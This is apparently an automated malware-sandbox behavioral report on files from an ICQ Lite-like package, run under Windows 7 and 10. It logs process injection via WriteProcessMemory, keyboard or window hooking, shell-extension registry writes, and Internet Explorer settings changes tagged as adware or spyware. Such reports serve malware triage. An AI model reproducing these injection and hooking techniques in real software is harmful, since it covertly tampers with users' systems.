N/A N/A C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe

"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 209.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 91.65.42.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:02

Platform

win7-20240221-en

Max time kernel

119s

Max time network

134s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2332 wrote to memory of 2200 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2332 wrote to memory of 2200 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2332 wrote to memory of 2200 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2332 wrote to memory of 2200 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2332 wrote to memory of 2200 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2332 wrote to memory of 2200 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2332 wrote to memory of 2200 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:03

Platform

win10v2004-20240221-en

Max time kernel

115s

Max time network

168s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4064 wrote to memory of 2584 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4064 wrote to memory of 2584 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4064 wrote to memory of 2584 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2584 -ip 2584

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 600

Network

Country Destination Domain Proto
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 187.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 23.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:02

Platform

win7-20240221-en

Max time kernel

123s

Max time network

135s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"

Signatures

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe

"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"

Network

N/A

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:02

Platform

win10v2004-20240221-en

Max time kernel

149s

Max time network

155s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\bentonite.png

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\bentonite.png

Network

Country Destination Domain Proto
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 202.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 209.78.101.95.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 175.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:02

Platform

win7-20240221-en

Max time kernel

117s

Max time network

129s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

Signatures

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods\ = "3" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ = "IMCLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib\ = "{346F8AC1-CEB1-4E3E-944B-87D9840505C3}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "MIBLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "PSFactoryBuffer" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods\ = "7" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS\ = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID\ = "ICQLiteShell.MCLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ThreadingModel = "Both" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer\ = "ICQLiteShell.MCLiteShellExt.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID\ = "ICQLiteShell.MCLiteShellExt.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\ = "ICQLiteShell 1.0 Type Library" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3000 wrote to memory of 3016 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3000 wrote to memory of 3016 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3000 wrote to memory of 3016 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3000 wrote to memory of 3016 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3000 wrote to memory of 3016 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3000 wrote to memory of 3016 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3000 wrote to memory of 3016 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:02

Platform

win7-20240221-en

Max time kernel

127s

Max time network

139s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 228

Network

N/A

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:02

Platform

win10v2004-20240221-en

Max time kernel

150s

Max time network

155s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2640 wrote to memory of 3864 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2640 wrote to memory of 3864 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2640 wrote to memory of 3864 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3864 -ip 3864

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 588

Network

Country Destination Domain Proto
US 8.8.8.8:53 147.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 190.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

N/A